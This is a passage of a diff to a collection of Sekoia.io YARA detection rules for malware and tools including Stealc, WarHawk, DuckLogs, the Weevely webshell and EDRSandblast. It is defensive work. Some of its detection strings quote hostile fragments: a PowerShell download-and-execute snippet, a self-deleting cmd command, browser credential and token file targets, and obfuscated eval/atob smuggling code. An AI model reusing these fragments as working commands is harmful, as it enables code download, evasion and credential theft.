+		$str13 = "/c timeout /t 10 & del /f /q \"" ascii
+
 	condition:
-		hash.md5( pe.rich_signature.clear_data ) == "256b60751602028612562b73ecdb163c"
+		uint16( 0 ) == 0x5A4D and 9 of them
 }
-rule SEKOIA_Tool_Koblas_Server_Strings : FILE
+rule SEKOIA_Crime_Sload_Zip_Archives : FILE
 {
 	meta:
-		description = "Detects Koblas server"
+		description = "Detects ZIP archives used by sLOad"
 		author = "Sekoia.io"
-		id = "ebd891da-69dd-474c-9e08-63d0b4cc654e"
-		date = "2024-05-23"
+		id = "5335ad65-bca5-4937-8634-46cbd7aa1b0e"
+		date = "2022-08-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_koblas_server_strings.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "590f3f71564c347be7b3b2a583606c3854744d0023cde464374cd7b61ec5a2d7"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/crime_sload_zip_archives.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f2bc6464de008f2ce40acabd87ebbd91659d317f57e223118937ba51f70d0f7f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244081,128 +244845,88 @@ rule SEKOIA_Tool_Koblas_Server_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "sent {sent} bytes and received {received} bytes" wide ascii
-		$ = "connection denied" ascii
-		$ = "loaded {} users" ascii
-		$ = "listening on {}:{} for incoming connections" ascii
+		$pic = { 00 00 00 [6] 2E ( 70 6E 67 | 67 69 66 | 6a 70 67 | 6A 70 65 67 ) }
+		$pdf = { 00 00 00 [8] 2E 70 64 66 }
+		$vbs = { ( 4c 65 67 67 69 6d 69 | 66 69 73 63 ) 2e ( 77 73 66 | 76 62 73 ) }
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 3 of them
+		uint16be( 0 ) == 0x504B and filesize < 30KB and all of them
 }
-
-rule SEKOIA_Implant_Win_Knotweed_Jumplump : FILE
+rule SEKOIA_Backdoor_Win_Warhawk
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detect the WarHawk backdoor used by the SideWinder intrusion-set"
 		author = "Sekoia.io"
-		id = "8f8cec7a-624b-4306-87f4-bde8ccc3a2d0"
-		date = "2022-07-27"
+		id = "d0ec19a7-cb08-4bca-b153-d7b0358186b4"
+		date = "2022-10-24"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_win_knotweed_jumplump.yar#L3-L75"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a2637a8a082b6a23756da188808405046ae986a5973f64859462c92e9306e6c8"
+		reference = "https://www.zscaler.com/blogs/security-research/warhawk-new-backdoor-arsenal-sidewinder-apt-group-0"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_warhawk.yar#L1-L56"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "09cd60f91c54da6ca051550c89629d11a55a89d5b0d5f6d5696232b4edfdd491"
 		score = 75
-		quality = 55
-		tags = "FILE"
+		quality = 58
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash_exe1 = "7d3574c62df44b74337fc74ec7877792b4ffa1486a49bb19668433c3ca8836b5"
+		hash_exe2 = "624c6b56ee3865f4a5792ad1946a8e86b876440a5af3bac22ac1dee92f1b7372"
+		hash_iso1 = "58b3686e4255d32dbcf7dee9dac1d5be6d4692d086cde167da1e1a5e0e1b315a"
+		hash_iso2 = "f97d5d3e1c2ceb3e9d23ae5b5d4e7c9857155df5acf7f67fee995cb041c797dc"
 
 	strings:
-		$s1 = "DllCanUnloadNow"
-		$s2 = "DllGetClassObject"
-		$s3 = "_initterm"
-		$s4 = "__C_specific_handler"
-		$s5 = "HeapFree"
-		$s6 = "EnterCriticalSection"
-		$s7 = "EventUnregister"
-		$s8 = "LeaveCriticalSection"
-		$s9 = "WaitForSingleObject"
-		$s10 = "GetCurrentThreadId"
-		$s11 = "GetLastError"
-		$s12 = "CloseHandle"
-		$s13 = "HeapAlloc"
-		$s14 = "EventRegister"
-		$s15 = "GetProcAddress"
-		$s16 = "DeleteCriticalSection"
-		$s17 = "GetCurrentProcessId"
-		$s18 = "GetProcessHeap"
-		$s19 = "DisableThreadLibraryCalls"
-		$s20 = "Sleep"
-		$s21 = "RtlCaptureContext"
-		$s22 = "RtlLookupFunctionEntry"
-		$s23 = "RtlVirtualUnwind"
-		$s24 = "UnhandledExceptionFilter"
-		$s25 = "SetUnhandledExceptionFilter"
-		$s26 = "GetCurrentProcess"
-		$s27 = "TerminateProcess"
-		$s28 = "QueryPerformanceCounter"
-		$s29 = "GetSystemTimeAsFileTime"
-		$s30 = "GetTickCount"
-		$s31 = "CoCreateInstance"
-		$s32 = "RegCloseKey"
-		$s33 = "GetModuleFileNameW"
-		$s34 = "RegCreateKeyExW"
-		$s35 = "RegSetValueExW"
-		$s36 = "LocalFree"
-		$s37 = "RegOpenKeyExW"
-		$s38 = "OLEAUT32.dll"
-		$s39 = "memcpy"
-		$s40 = "memcmp"
-		$s41 = "memset"
-		$s42 = "LoadLibraryW"
-		$s43 = "OpenProcessToken"
-		$s44 = "DllRegisterServer"
-		$s45 = "DllUnregisterServer"
-		$s46 = "040904B0" wide
-		$api_hash1 = {5D 44 11 FF}
-		$api_hash2 = {4C 77 D6 07}
-		$api_hash3 = {38 68 0D 16}
-		$api_hash4 = {40 DE CE 72}
-		$api_hash5 = {08 87 1D 60}
-		$api_hash6 = {26 C6 0B 1B}
-		$api_hash7 = {0C DC 67 55}
-		$api_hash8 = {AA C5 E2 5D}
-		$api_hash9 = {C6 96 87 52}
-		$api_hash10 = {F8 8E C2 92}
+		$ = {7b205c226e616d655c223a205c2225735c222c205c2273697a655c223a205c225c222c205c226d6f645c223a205c2225735c222c205c22747970655c223a205c2246696c6520666f6c6465725c22207d2c}
+		$ = {7b20225f68776964223a20222573222c20225f636f6d7075746572223a20222573222c20225f757365726e616d65223a20222573222c20225f6f73223a2022257322207d}
+		$ = {7b5c226e616d655c223a205c2225735c222c205c22747970655c223a205c2225735c227d2c}
+		$ = {7b20225f68776964223a20222573222c20225f66696c656d67725f646f6e65223a202274727565222c20225f726573706f6e7365223a2022257322207d}
+		$ = {7b20225f68776964223a20222573222c20225f7461736b223a20227472756522207d}
+		$ = {7b20225f68776964223a20222573222c20225f7461736b5f646f6e65223a202274727565222c20225f6964223a2022257322207d}
+		$ = {7b20225f68776964223a20222573222c20225f636d64223a20227472756522207d}
+		$ = {7b20225f68776964223a20222573222c20225f636d645f646f6e65223a202274727565222c20225f726573706f6e7365223a2022257322207d}
+		$ = {7b20225f68776964223a20222573222c20225f66696c656d6772223a20227472756522207d}
+		$ = {7b20225f68776964223a2022257322207d}
+		$ = {7b20225f68776964223a20222573222c20225f70696e67223a20227472756522207d}
+		$ = "cmd.exe"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and pe.number_of_sections == 7 and all of ( $s* ) and 1 of ( $api_hash* )
+		all of them
 }
-
-rule SEKOIA_Tool_Pchunter_And_Related_Certificate : FILE
+rule SEKOIA_Luckymouse_Sysupdate_Loader : FILE
 {
 	meta:
-		description = "Detects PCHunter and associated binairies & drivers"
+		description = "Detects decryption routine prologue of sysupdate loader"
 		author = "Sekoia.io"
-		id = "757c7738-4ee8-4b4e-bdda-0c5b0c010f40"
-		date = "2022-09-07"
+		id = "6007e846-d467-4d07-b345-e25191b7c8bc"
+		date = "2022-08-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_pchunter_and_related_certificate.yar#L3-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "924a85b2eaec73b628e705b3bb2e464582a71c19317d2023b1422b1b8ad97a51"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/luckymouse_sysupdate_loader.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9d46b74d8e5f94ecd844cffcd6d0d29eb662374c1d6fbe87acf3c877e5f963b3"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$s1 = { DB D4 33 C9 66 B9 ?? ?? E8 FF FF FF FF }
+
 	condition:
-		uint16be( 0 ) == 0x4d5a and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial contains "05:51:bc:8c:6a:a2:ca:03:2b:c6:71:38:30:d8:49:a3" ) and filesize > 400KB and filesize < 20MB
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Infostealer_Win_Stealc_Str_Oct24 : FILE
+rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_Attachment : FILE
 {
 	meta:
-		description = "Finds Stealc standalone samples (or dumps) based on the strings"
+		description = "Detects Gamaredon HTMLSmuggling attachment"
 		author = "Sekoia.io"
-		id = "7448fafe-206c-4f9c-b5a3-cbabec12a45b"
-		date = "2024-10-20"
+		id = "a39b6e67-9327-4c5b-902a-b9853cfefc8e"
+		date = "2023-01-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_stealc_str_oct24.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4f7fece81c3fe1e56b57aed4030b48331b53443a200799046fe84c895b591a71"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_htmlsmuggling_attachment.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e13da493404b27ef0c026ca32accbb30792981e810c099d633f5de225e241b4d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244210,35 +244934,26 @@ rule SEKOIA_Infostealer_Win_Stealc_Str_Oct24 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "-nop -c \"iex(New-Object Net.WebClient).DownloadString(" ascii
-		$str02 = "Azure\\.IdentityService" ascii
-		$str03 = "steam_tokens.txt" ascii
-		$str04 = "\"encrypted_key\":\"" ascii
-		$str05 = "prefs.js" ascii
-		$str06 = "browser: FileZilla" ascii
-		$str07 = "profile: null" ascii
-		$str08 = "url:" ascii
-		$str09 = "login:" ascii
-		$str10 = "password:" ascii
-		$str11 = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" ascii
-		$str12 = "ChromeFuckNewCookies" ascii
-		$str13 = "/c timeout /t 10 & del /f /q \"" ascii
+		$ = "['at'+'ob'](" ascii
+		$ = "['ev'+'al'](" ascii
+		$ = "document.querySelectorAll('[" ascii
+		$ = "[0].innerHTML.split(' ').join('')))" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 9 of them
+		filesize < 1MB and 2 of them
 }
-rule SEKOIA_Apt_Ta428_Tmanger_Strings : FILE
+rule SEKOIA_Infostealer_Win_Ducklogs : FILE
 {
 	meta:
-		description = "Detects Tmanger malware"
+		description = "Detects DuckLogs based on specific strings"
 		author = "Sekoia.io"
-		id = "f600404d-3f93-4e3f-bba7-9f519f67c6cb"
-		date = "2022-09-06"
+		id = "165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5"
+		date = "2022-12-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_ta428_tmanger_strings.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e045f38367fa7f3cdcc908e60de4386889c7878c95b1a40f63fd70683699b0f1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_ducklogs.yar#L1-L30"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5db1a5595ec41488da620606bbcb36d0d686f9d6b7a0479439c53625df0886a0"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244246,88 +244961,96 @@ rule SEKOIA_Apt_Ta428_Tmanger_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "sock_hmutex" wide ascii
-		$ = "cmd_hmutex" wide ascii
-		$ = "%s_%d.bmp" wide ascii
-		$ = "WSAStartup Error!" wide ascii
-		$ = "4551-8f84-08e738aec" wide ascii
-		$ = "Init failed!" wide ascii
-		$ = "GetLanIP error!" wide ascii
-		$ = "chcp & exit" wide ascii
-		$ = "GetHostname error!" wide ascii
-		$ = "[Num Lock]" wide ascii
+		$dck = "DuckLogs" ascii wide
+		$str01 = "CheckRemoteDebuggerPresent" ascii
+		$str02 = "MozGlueNotFound" ascii
+		$str03 = "get_DecryptedPassword" ascii
+		$str04 = "get_Extension" ascii
+		$str05 = "set_UseShellExecute" ascii
+		$str06 = "FirefoxPasswords" ascii
+		$str07 = "GetAllGeckoCookies" ascii
+		$str08 = "GetAllBlinkDownloadsBy" ascii
+		$str09 = "Grabbers" ascii
+		$str10 = "Utility" ascii
+		$str11 = "Persistance" ascii
+		$str12 = "Clipboard" ascii
+		$str13 = "WaterfoxGrabber" ascii
+		$str14 = "AvastGrabber" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 4 of them
+		uint16( 0 ) == 0x5A4D and ( ( #dck > 4 and 2 of ( $str* ) ) or 12 of them )
 }
-
-rule SEKOIA_Backdoor_Win_Minibike : FILE
+rule SEKOIA_Loader_Win_Gcleaner : FILE
 {
 	meta:
-		description = "Detect the MINIBIKE malware"
+		description = "Detect the GCleaner loader using specific strings"
 		author = "Sekoia.io"
-		id = "d758c41a-279c-4706-9cf3-87740e45f71d"
-		date = "2024-04-08"
+		id = "0c085da3-ec77-4141-a927-bef1578a6dee"
+		date = "2022-10-11"
 		modified = "2024-12-19"
-		reference = "https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_minibike.yar#L4-L37"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d09ab10aff629c6edafa7df640e98bcb6b2523a9bf4e2f2ca87f6694ccfe21bf"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_gcleaner.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f38aaab2911e4e901780bb6df2c58f02fa80d3e39fb56f60072285d0a929ba23"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "985967e245d8fbc722e30371c9ed48c3269ceaa6b9b9b80caf2b95c920c856c2"
-		hash2 = "ab0b602665b609392eacdcbfc6c1981f216c19f21e2156a55cf9998eab02227b"
-		hash3 = "8e2429d70989bbdd2ea8842dce7c3d790ebe148490ee519b47767557f4a4a733"
-		hash4 = "be86b8559a84d97aa1cc9852e60a553f5164477bacfc69b7f3453ad37fb6fd2a"
-		hash5 = "78065411e7e8eb205ddae7215a229b7c93bdca5d628670f89caa982238ac7eb6"
-		hash6 = "73bf3a5877a7fe16544d15670e3ece034e4826323ba555b3527ad4d061f44ec4"
 
 	strings:
-		$ = "Mini-Junked.dll"
+		$str01 = "G-Cleaner can clean unneeded files, settings, and Registry entries" ascii
+		$str02 = "3.  Click \"Run G-Cleaner\"" ascii
+		$str03 = "Garbage_Cleaner" ascii
+		$str04 = "GCleaner.Properties" ascii
+		$str05 = "SOFTWARE\\GCleaner\\Install" wide
+		$str06 = "SOFTWARE\\GCleaner\\Trial" wide
+		$str07 = "SOFTWARE\\GCleaner\\License" wide
+		$str08 = "G-Cleaner activation" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them or pe.imphash ( ) == "75a9ae7d4394abdc30e2a873908fa09d" or hash.md5 ( pe.rich_signature.clear_data ) == "06b2ec5892ac9ad566693b04cf427f3f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "612006b6f68cd0b8b0d48252dbdef4be" )
+		uint16( 0 ) == 0x5A4D and 6 of them
 }
-
-rule SEKOIA_Backdoor_Win_Sidewinder_Cobaltstrike_2022_09
+rule SEKOIA_Tool_Edrsandblast_Api_Strings : FILE
 {
 	meta:
-		description = "Detect the SideWinder malware"
+		description = "Detects EDRSandblast API strings"
 		author = "Sekoia.io"
-		id = "b5e8f87a-4a2c-49bb-aa98-bf3fb5056b23"
-		date = "2022-10-24"
+		id = "8a5dc171-dce8-4b5a-96e9-53dd1855e8c1"
+		date = "2024-01-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_sidewinder_cobaltstrike_2022_09.yar#L4-L29"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f2b719170783c1bfaa4c4772e5cff73797be3056204566844c236d1857869e4c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_edrsandblast_api_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "cd6afe68cf04e4949add323e0b5af5ea577b3dca07743e312e8236bf5c937672"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {65004e004500560045005200200047004f004e004e00410020004700490056004500200059004f0055002000550050002100}
+		$ = "[!] Required driver file not present at" wide
+		$ = "[!] New uninstall / install attempt failed" wide
+		$ = "[!] Kernel offsets are missing from the CSV" wide
+		$ = "[+] Downloading wdigest offsets from the MS Symbol Server" wide
+		$ = "[+] Check if EDR callbacks are registered on process" wide
 
 	condition:
-		$s1 or pe.imphash ( ) == "b1e345b2d78e4b82617d995d18100790" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ac989507d4af352fa354560efef99ba6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "8090b29a44c750b7b21287f9639fe747" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ea8693d6bacf3e7876f717a3d8abc433" )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
 }
-rule SEKOIA_Tool_Win_Sharpshares : FILE
+rule SEKOIA_Malware_Valleyrat_1Ststage_Strings : FILE
 {
 	meta:
-		description = "Finds sharpshares EXE based on strings"
+		description = "Detects ValleyRat 1stage"
 		author = "Sekoia.io"
-		id = "ef90d573-12f8-4216-9a9e-96e7d1e841d0"
-		date = "2024-06-10"
+		id = "6628ba47-37ad-4bdb-bbc0-7286d777000e"
+		date = "2024-06-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/mitchmoser/SharpShares/releases"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_win_sharpshares.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6aa96d7c24638451bde98497cc7c844c87612d81cc7826113729c80bd5180442"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/malware_valleyrat_1ststage_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "78c45b8bd9241646512483d179d48b0e42e97fa1c18d6afd1af4423f7b7ce3c6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244335,33 +245058,27 @@ rule SEKOIA_Tool_Win_Sharpshares : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "<GetAllShares>b__0" ascii
-		$str02 = "<SearchLDAP>b__0_0" ascii
-		$str03 = "get_AccessControlType" ascii
-		$str04 = "get_IdentityReference" ascii
-		$str05 = "get_PropertiesToLoad" ascii
-		$str06 = "SharpShares\\obj\\Release\\SharpShares.pdb" ascii
-		$str07 = "/filter:SYSVOL,NETLOGON,IPC$,PRINT$" wide
-		$str08 = "/threads:50 /ldap:servers" wide
-		$str09 = "SharpShares.exe" ascii wide
-		$str10 = "[+] LDAP Search Results:" wide
-		$str11 = "[+] Finished Enumerating Shares" wide
+		$ = "%016llX.DLL" wide
+		$ = "%s\\%s" wide
+		$ = "%016llX\\%s" wide
+		$ = "connection already in progress"
+		$ = "SleepConditionVariableSRW"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 6 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 4MB and all of them
 }
-rule SEKOIA_Rat_Win_Hiddenz : FILE
+rule SEKOIA_Apt_Apt10_Hui_Loader : FILE
 {
 	meta:
-		description = "Lazy rule to detect Hiddenz's HVNC sample based on te malware name contained in numerous samples"
+		description = "Specific string for HUI Loader"
 		author = "Sekoia.io"
-		id = "4e582cda-4c50-4554-8e26-9d26206a02ee"
-		date = "2022-08-24"
+		id = "97d17052-80d0-4f8e-8b3a-2e0d622522a9"
+		date = "2022-07-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_hiddenz.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "92f62c893d8a081cd52deaaac93d622fbb1c8e9c7df214e34c6b8066be72a424"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt10_hui_loader.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "33df202599c6bceff2cf76acdc0096f7167acb69c541b3cfe4cdc34edc174005"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244369,25 +245086,23 @@ rule SEKOIA_Rat_Win_Hiddenz : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$name0 = "Hiddenz's HVNC" wide ascii
-		$name1 = "Hiddenzs_HVNC_DLL" wide ascii
-		$name2 = "HiddenzHVNC" wide ascii
+		$s1 = "HUIHWASDIHWEIUDHDSFSFEFWEFEWFDSGEFERWGWEEFWFWEWD" wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of ( $name* )
+		( uint16be( 0 ) == 0x4d5a ) and filesize > 30KB and filesize < 100KB and 1 of them
 }
-rule SEKOIA_Radx_Stealer : FILE
+rule SEKOIA_Strongpity_Malware : FILE
 {
 	meta:
-		description = "detection of RADX stealer based on function named in the .NET payload"
+		description = "Detects obfuscation used by StrongPity"
 		author = "Sekoia.io"
-		id = "bf2aae08-169c-4bc9-a1ac-80f4b79ef6d7"
-		date = "2023-12-22"
+		id = "f19a685c-599d-42cf-a5d8-7a2375102f97"
+		date = "2024-02-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/radx_stealer.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b83ca089bb0ea7ad8b0f372de9a95ea9d35514f6a063b63986e6fd25bdc07095"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/strongpity_malware.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "14be5eccb4e754d6dad69cda51a924241cc75f5d758bc2d746acfe41e1684b3a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244395,27 +245110,25 @@ rule SEKOIA_Radx_Stealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "get_FileName" ascii fullword
-		$s2 = "set_FileName" ascii fullword
-		$f1 = "TripleDESCryptoServiceProvider" ascii fullword
-		$f2 = "SendBase64ToServer" ascii fullword
-		$f3 = "SendCommandOutputToServer" ascii fullword
+		$rand_edi = {E8 ?? ?? ?? ??    8B F8 81 E7 07 00 00 80    79 ?? 4F 83 CF F8 47 83 C7 02}
+		$rand_esi = {E8 ?? ?? ?? ?? 8B F0 81 E6 07 00 00 80 79 ?? 4E 83 CE F8 46 83 C6 02}
+		$rand_eax = {E8 ?? ?? ?? ??    25 07 00 00 80 79 ?? 48 83 C8 F8 40 83 C0 02}
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 500KB and all of them
+		uint16be( 0 ) == 0x4d5a and #rand_edi + #rand_esi + #rand_eax > 20
 }
-rule SEKOIA_Weevely_Webshell_Payload : FILE
+rule SEKOIA_Stealer_Win_Demotryspy : FILE
 {
 	meta:
-		description = "Detects weevely webshell"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "f2879c6e-3d1b-41be-8b1d-4f0503fd4b29"
-		date = "2024-04-22"
+		id = "70af0e40-b177-49a3-bff4-723f3f4aa375"
+		date = "2024-02-09"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/weevely_webshell_payload.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "bb02ec519d77526cc81ebd7743336b333b9498f79079f7008970cf1bb51c4948"
+		reference = "https://paper.seebug.org/3115/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/stealer_win_demotryspy.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b7a910e4d394d2122e6b4fe76daa6691a642396e27f7a47d09232f4b7eb424ee"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244423,59 +245136,65 @@ rule SEKOIA_Weevely_Webshell_Payload : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "<?php include \""
-		$s2 = ".basename(__FILE__).\""
-		$s3 = ";__HALT_COMPILER(); ?>"
+		$demotry1 = "DemoTry.exe"
+		$demotry2 = "DemoTry\\Release\\DemoTry.pdb"
+		$wide1 = "\\loc.tmp" wide
+		$wide2 = "\\log.tmp" wide
+		$wide3 = "\\Google\\Chrome\\User Data" wide
+		$wide4 = "\\Default\\Login data" wide
+		$wide5 = "\\Local State" wide
 
 	condition:
-		all of them and filesize < 1MB and @s1 == 0 and @s2 < @s3
+		uint16be( 0 ) == 0x4d5a and ( 1 of ( $demotry* ) or all of ( $wide* ) )
 }
-rule SEKOIA_Loader_Win_Red0044_Powershell_May24 : FILE
+
+rule SEKOIA_Backdoor_Win_Ketrum2
 {
 	meta:
-		description = "Finds PowerShell scripts used in a malvertising campaign to deliver NetSupport RAT"
